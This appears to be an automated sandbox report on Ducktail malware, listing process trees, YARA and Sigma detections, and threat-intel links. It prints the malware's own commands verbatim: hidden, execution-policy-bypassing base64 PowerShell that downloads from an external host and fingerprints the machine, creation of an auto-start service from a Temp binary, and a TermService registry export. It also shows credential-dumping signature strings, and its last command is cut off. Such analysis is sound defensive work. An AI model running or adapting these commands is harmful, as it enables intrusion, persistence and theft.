conhost.exe (PID: 5392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

myRdpService.exe (PID: 8396 cmdline: C:\Windows\Temp\myRdpService.exe cakoi7 MD5: 10C767E2635167724D6A03475ED8F7A9)

regedit.exe (PID: 9036 cmdline: "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService" MD5: 999A30979F6195BF562068639FFC4426)

powershell.exe (PID: 9076 cmdline: "powershell.exe" -Command "systeminfo | Select-String \"OS Name\",\"OS Version\";" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 9096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

systeminfo.exe (PID: 9016 cmdline: "C:\Windows\system32\systeminfo.exe" MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 1800 cmdline: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 3068 cmdline: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DUCKTAIL	According to Tony Lambert, this is a malware written in .NET. It was observed to be delivered using the .NET Single File deployment feature.	No Attribution	https://forensicitguy.github.io/analyzing-net-core-single-file-ducktail/ https://harfanglab.io/en/insidethelab/reverse-engineering-ida-pro-aot-net/ https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf https://labs.withsecure.com/content/dam/labs/docs/WithSecure_Research_DUCKTAIL.pdf https://securelist.com/ducktail-fashion-week/111017/	https://malpedia.caad.fkie.fraunhofer.de/details/win.ducktail

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000025.00000002.4737674949.00007FF6FA2E6000.00000004.00000001.01000000.0000000B.sdmp	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0xdac4:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0x11f94:$a2: 0123456789012345678901234567890123456789 0x3291c:$a3: NTPASSWORD 0x2f7b4:$a4: LMPASSWORD 0x5cd04:$a5: aad3b435b51404eeaad3b435b51404ee 0x14f54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
Process Memory Space: powershell.exe PID: 8976	JoeSecurity_Ducktail_12	Yara detected Ducktail	Joe Security
Process Memory Space: powershell.exe PID: 8976	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x392d49:$b1: ::WriteAllBytes( 0x13f4a6:$b2: ::FromBase64String( 0x13fe45:$b2: ::FromBase64String( 0x13ff61:$b2: ::FromBase64String( 0x295c64:$b2: ::FromBase64String( 0x29639f:$b2: ::FromBase64String( 0x2965d8:$b2: ::FromBase64String( 0x2967f0:$b2: ::FromBase64String( 0x2968fd:$b2: ::FromBase64String( 0x29696d:$b2: ::FromBase64String( 0x2969c5:$b2: ::FromBase64String( 0x296a29:$b2: ::FromBase64String( 0x296a86:$b2: ::FromBase64String( 0x296b0f:$b2: ::FromBase64String( 0x296b84:$b2: ::FromBase64String( 0x296bf2:$b2: ::FromBase64String( 0x296c53:$b2: ::FromBase64String( 0x296cbc:$b2: ::FromBase64String( 0x296d1d:$b2: ::FromBase64String( 0x296dae:$b2: ::FromBase64String( 0x296e0a:$b2: ::FromBase64String(
Process Memory Space: powershell.exe PID: 7088	JoeSecurity_Ducktail_12	Yara detected Ducktail	Joe Security
Process Memory Space: powershell.exe PID: 7088	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2761c9:$b1: ::WriteAllBytes( 0x2638fe:$b2: ::FromBase64String( 0x2666c4:$b2: ::FromBase64String( 0x2667e0:$b2: ::FromBase64String( 0x266856:$b2: ::FromBase64String( 0x26d08c:$b2: ::FromBase64String( 0x29e8a1:$b3: ::UTF8.GetString( 0x1846f:$s1: -join 0xd2af3:$s1: -join 0xdfbc8:$s1: -join 0xe2f9a:$s1: -join 0xe364c:$s1: -join 0xe513d:$s1: -join 0xe7343:$s1: -join 0xe7b6a:$s1: -join 0xe83da:$s1: -join 0xe8b15:$s1: -join 0xe8b47:$s1: -join 0xe8b8f:$s1: -join 0xe8bae:$s1: -join 0xe93fe:$s1: -join
Process Memory Space: svczHost.exe PID: 3468	JoeSecurity_Ducktail_6	Yara detected Ducktail	Joe Security
Process Memory Space: svczHost.exe PID: 3468	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0x57517:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0x58c73:$a2: 0123456789012345678901234567890123456789 0x65637:$a3: NTPASSWORD 0x6436e:$a4: LMPASSWORD 0x76e62:$a5: aad3b435b51404eeaad3b435b51404ee 0x59b6b:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
37.2.myRdpService.exe.7ff6f9de0000.0.unpack	hacktool_windows_moyix_creddump	creddump is a python tool to extract credentials and secrets from Windows registry hives.	@mimeframe	0x511cc4:$a1: !@#$%^&()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(@&% 0x516194:$a2: 0123456789012345678901234567890123456789 0x536b1c:$a3: NTPASSWORD 0x5339b4:$a4: LMPASSWORD 0x560f04:$a5: aad3b435b51404eeaad3b435b51404ee 0x519154:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0

Other

Source	Rule	Description	Author	Strings
amsi64_7088.amsi.csv	JoeSecurity_Ducktail_12	Yara detected Ducktail	Joe Security
amsi64_7088.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xfd1f:$b1: ::WriteAllBytes( 0xc19e:$b2: ::FromBase64String( 0xef65:$b2: ::FromBase64String( 0xf082:$b2: ::FromBase64String( 0x528:$b3: ::UTF8.GetString( 0xbdef:$s1: -join 0x238:$s4: += 0x25b:$s4: += 0x559b:$s4: += 0x565d:$s4: += 0x9884:$s4: += 0xb9a1:$s4: += 0xbc8b:$s4: += 0xbdd1:$s4: += 0xf239:$s4: += 0xf436:$s4: += 0x116e6:$s4: += 0x63c05:$s4: += 0x686ae:$s4: += 0x6872e:$s4: += 0x687f4:$s4: +=

Sigma Signatures

System Summary

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Source: Process started

Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB

Sigma detected: PowerShell Base64 Encoded WMI Classes

Source: Process started

Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA, CommandLine: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -Execution

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB

Sigma detected: Suspicious New Service Creation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5052, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto , ProcessId: 8252, ProcessName: sc.exe

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcA